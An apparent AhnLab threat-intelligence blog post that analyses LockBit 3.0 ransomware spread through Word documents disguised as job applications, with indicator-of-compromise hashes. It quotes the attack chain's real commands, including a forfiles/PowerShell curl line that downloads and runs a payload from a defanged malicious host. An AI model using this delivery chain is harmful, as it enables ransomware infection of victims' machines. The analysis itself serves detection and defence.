LockBit 3.0 Ransomware Distributed via Word Documents

The ASEC analysis team has identified that LockBit 3.0 ransomware distributed while disguised as job application emails in NSIS format is also being distributed in Word document format. The specific distribution channel has not yet been identified, but considering that the distributed file names include names of people such as ‘Lim Gyu Min.docx’ or ‘Jeon Chae Rin.docx’, it is likely that they were distributed disguised as job applications, similar to the past cases.

There is an external link in the word\_rels\settings.xml.rels file inside the Word document. When the document file is executed through this, the user PC accesses hxxp://ppaauuaa11232[.]cc/dlx5rc.dotm and downloads an additional dotm file.

Figure 1. settings.xml.rels
Figure 2. URL access screen when the Word document is executed

The document file contains an image that prompts the use of a macro script. The downloaded dlx5rc.dotm contains a VBA macro, and when the user clicks Enable Content, the malicious macro script is executed.

Figure 3. Word File
Figure 4. Document properties

The VBA macro code inside the dotm file is as follows.

Figure 5. Malicious VBA macro code

The strings in the code are obfuscated and use CLSID(72C24DD5-D70A-438B-8A42-98424B88AFB8). When the VBA macro is executed, it creates a file named skeml.lnk in the C:\Users\Public\ folder. The TargetPath of the link file is forfiles.exe, which is executed through rundll32.exe. The command that executes the link file is as follows.

  • rundll32 url.dll,OpenURL C:\Users\Public\skeml.lnk

When the link file is executed, additional malicious files are downloaded from hxxp://ppaauuaa11232[.]cc/aaa.exe via PowerShell commands and then saved in C:\Users\Public\156498415616651651984561561658456.exe before being executed. The command executed via the LNK file is as follows.

  • forfiles.exe /p c:\windows\system32 /m notepad.exe /c “”cmd /c powershell/W 01 curl hxxp://ppaauuaa11232.cc/aaa.exe -o C:\Users\Public\156498415616651651984561561658456.exe;C:\Users\Public\156498415616651651984561561658456.exe”
Figure 6. RAPIT process tree

The currently downloaded 156498415616651651984561561658456.exe file is LockBit 3.0 ransomware in NSIS form.

Figure 7. Desktop after ransomware infection

As LockBit ransomware is being distributed through various methods, user caution is advised. Users should update the applications and V3 they use to the latest version and refrain from opening document files from unknown sources.

[File Detection]

[Behavior Detection]

[IOC Info]
2d8b6275dee02ea4ed218ba2673b834e (docx)
97c07d03556ddcfc8ebfa462df546eb5 (docx)
45dfdde3df07b6ccc23b7ae6e3dc1212 (docx)
77c5fb080bf77f099c5b5f268dcf4435 (dotm)
738bee5280d512a238c3bb48c3278f63 (lnk)
7b74e4fb9a95f41d5d9b4a71a5fe40b9 (exe)

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Categories:Malware Information

Tagged as:, ,

0 0 votes
Article Rating

Inline Feedbacks
View all comments

[…] Recently, researchers discovered that LockBit 3.0 ransomware is being delivered in Word document format while masquerading as job application emails in NSIS format. […]


[…] LockBit 3.0 Ransomware Distributed via Word Documents Comments are closed. […]


[…] の別の 2 つの配布方法を観察しました。1 つは悪意のある VBA マクロを含むDOTM ドキュメントを使用し、もう 1 つはNSIS 形式のマルウェアを含む ZIP […]


[…] September 2022, AnhLab observed another two methods of LockBit 3.0 distribution, one using DOTM documents with malicious VBA macro and one dropping ZIP files containing the malware in NSIS […]


[…] Researchers discovered that LockBit 3.0 ransomware is being delivered in Word document format while masquerading as job application emails in NSIS format. […]